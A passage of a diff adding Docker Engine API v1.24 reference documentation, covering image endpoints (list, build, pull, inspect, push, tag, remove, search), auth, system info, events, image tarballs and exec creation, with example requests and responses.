+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+  -   `before`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+  -   `since`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.24/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the `Dockerfile`. This is
+        ignored if `remote` is specified and points to an external `Dockerfile`.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+        You can provide one or more `t` parameters.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file. If
+        the URI points to a tarball, the file is downloaded by the daemon and
+        the contents therein used as the context for the build. If the URI
+        points to a tarball and the `dockerfile` parameter is also specified,
+        there must be a file with the corresponding path inside the tarball.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+-   **buildargs** – JSON map of string pairs for build-time variables. Users pass
+        these values at build-time. Docker uses the `buildargs` as the environment
+        context for command(s) run via the Dockerfile's `RUN` instruction or for
+        variable expansion in other Dockerfile instructions. This is not meant for
+        passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg)
+-   **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+-   **labels** – JSON map of string pairs for labels to set on the image.
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
+        object with the following structure:
+
+            {
+                "docker.example.com": {
+                    "username": "janedoe",
+                    "password": "hunter2"
+                },
+                "https://index.docker.io/v1/": {
+                    "username": "mobydock",
+                    "password": "conta1n3rize14"
+                }
+            }
+
+    This object maps the hostname of a registry to an object containing the
+    "username" and "password" for that registry. Multiple registries may
+    be specified as the build may be based on an image requiring
+    authentication to pull from any arbitrary registry. Only the registry
+    domain name (and port if not the default "443") are required. However
+    (for legacy reasons) the "official" Docker, Inc. hosted registry must
+    be specified with both a "https://" prefix and a "/v1/" suffix even
+    though Docker will prefer to use the v2 registry API.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.24/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull. The name may include a tag or
+        digest. This parameter may only be used when pulling an image.
+        The pull is cancelled if the HTTP connection is closed.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+        This parameter may only be used when importing an image.
+-   **repo** – Repository name given to an image when it is imported.
+        The repo may include a tag. This parameter may only be used when importing
+        an image.
+-   **tag** – Tag or digest. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com"
+    }
+        ```
+
+    - Token based login:
+
+        ```
+    {
+            "identitytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.24/images/example/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c",
+       "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a",
+       "Comment" : "",
+       "Os" : "linux",
+       "Architecture" : "amd64",
+       "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+       "ContainerConfig" : {
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "User" : "",
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "Labels" : {
+             "com.example.license" : "GPL",
+             "com.example.version" : "1.0",
+             "com.example.vendor" : "Acme"
+          },
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "ExposedPorts" : null,
+          "Cmd" : [
+             "/bin/sh",
+             "-c",
+             "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0"
+          ]
+       },
+       "DockerVersion" : "1.9.0-dev",
+       "VirtualSize" : 188359297,
+       "Size" : 0,
+       "Author" : "",
+       "Created" : "2015-09-10T08:30:53.26995814Z",
+       "GraphDriver" : {
+          "Name" : "aufs",
+          "Data" : null
+       },
+       "RepoDigests" : [
+          "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+       ],
+       "RepoTags" : [
+          "example:1.0",
+          "example:latest",
+          "example:stable"
+       ],
+       "Config" : {
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "StdinOnce" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Cmd" : [
+             "/bin/bash"
+          ],
+          "ExposedPorts" : null,
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "Labels" : {
+             "com.example.vendor" : "Acme",
+             "com.example.version" : "1.0",
+             "com.example.license" : "GPL"
+          },
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "WorkingDir" : "",
+          "User" : ""
+       },
+       "RootFS": {
+           "Type": "layers",
+           "Layers": [
+               "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6",
+               "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
+           ]
+       }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.24/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.24/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+The push is cancelled if the HTTP connection is closed.
+
+**Example request**:
+
+    POST /v1.24/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com",
+    }
+        ```
+
+    - Identity token based login:
+
+        ```
+    {
+            "identitytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.24/images/test/tag?repo=myrepo&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.24/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.24/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "wma55/u1210sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "jdswinbank/sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "vgauthier/sshd",
+                "star_count": 0
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+-   **limit** – maximum returned search results
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `stars=<number>`
+  -   `is-automated=(true|false)`
+  -   `is-official=(true|false)`
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 3.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Validate credentials for a registry and get identity token,
+if available, for accessing the registry without password.
+
+**Example request**:
+
+    POST /v1.24/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+    {
+         "Status": "Login Succeeded",
+         "IdentityToken": "9cbaf023786cd7..."
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.24/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Architecture": "x86_64",
+        "ClusterStore": "etcd://localhost:2379",
+        "CgroupDriver": "cgroupfs",
+        "Containers": 11,
+        "ContainersRunning": 7,
+        "ContainersStopped": 3,
+        "ContainersPaused": 1,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelMemory": true,
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OSType": "linux",
+        "OperatingSystem": "Boot2Docker",
+        "Plugins": {
+            "Volume": [
+                "local"
+            ],
+            "Network": [
+                "null",
+                "host",
+                "bridge"
+            ]
+        },
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "SecurityOptions": [
+            "apparmor",
+            "seccomp",
+            "selinux"
+        ],
+        "ServerVersion": "1.9.0",
+        "SwapLimit": false,
+        "SystemStatus": [["State", "Healthy"]],
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.24/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.12.0",
+         "Os": "linux",
+         "KernelVersion": "3.19.0-23-generic",
+         "GoVersion": "go1.6.3",
+         "GitCommit": "deadbee",
+         "Arch": "amd64",
+         "ApiVersion": "1.24",
+         "BuildTime": "2016-06-14T07:09:13.444803460+00:00",
+         "Experimental": true
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.24/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.24/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Mounts": [
+           {
+             "Source": "/data",
+             "Destination": "/data",
+             "Mode": "ro,Z",
+             "RW": false
+           }
+         ],
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+-   **pause** – 1/True/true or 0/False/false, whether to pause the container before committing
+-   **changes** – Dockerfile instructions to apply while committing
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
+
+Docker images report the following events:
+
+    delete, import, load, pull, push, save, tag, untag
+
+Docker volumes report the following events:
+
+    create, mount, unmount, destroy
+
+Docker networks report the following events:
+
+    create, connect, disconnect, destroy
+
+Docker daemon report the following event:
+
+    reload
+
+**Example request**:
+
+    GET /v1.24/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Server: Docker/1.12.0 (linux)
+    Date: Fri, 29 Apr 2016 15:18:06 GMT
+    Transfer-Encoding: chunked
+
+    {
+      "status": "pull",
+      "id": "alpine:latest",
+      "Type": "image",
+      "Action": "pull",
+      "Actor": {
+        "ID": "alpine:latest",
+        "Attributes": {
+          "name": "alpine"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101301854122
+    }
+    {
+      "status": "create",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "create",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101381709551
+    }
+    {
+      "status": "attach",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "attach",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101383858412
+    }
+    {
+      "Type": "network",
+      "Action": "connect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101394865557
+    }
+    {
+      "status": "start",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "start",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101607533796
+    }
+    {
+      "status": "resize",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "resize",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "height": "46",
+          "image": "alpine",
+          "name": "my-container",
+          "width": "204"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101610269268
+    }
+    {
+      "status": "die",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "die",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "exitCode": "0",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105079144137
+    }
+    {
+      "Type": "network",
+      "Action": "disconnect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105230860245
+    }
+    {
+      "status": "destroy",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "destroy",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105338056026
+    }
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+  -   `label=<string>`; -- image and container label to filter
+  -   `type=<string>`; -- either `container` or `image` or `volume` or `network` or `daemon`
+  -   `volume=<string>`; -- volume to filter
+  -   `network=<string>`; -- network to filter
+  -   `daemon=<string>`; -- daemon name or id to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.24/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.24/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.24/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Transfer-Encoding: chunked
+
+    {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[=                                                 ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[==                                                ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[===                                               ]  98.3 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[=====                                             ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"}
+    ...
+    {"stream":"Loaded image: busybox:latest\n"}
+
+**Example response**:
+
+If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress
+details are suppressed, and only a confirmation message is returned once the
+action completes.
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Transfer-Encoding: chunked
+
+    {"stream":"Loaded image: busybox:latest\n"}
+
+**Query parameters**:
+
+-   **quiet** – Boolean value, suppress progress details during load. Defaults
+      to `0` / `false` if omitted.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "DetachKeys": "ctrl-p,ctrl-q",
+      "Privileged": true,
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
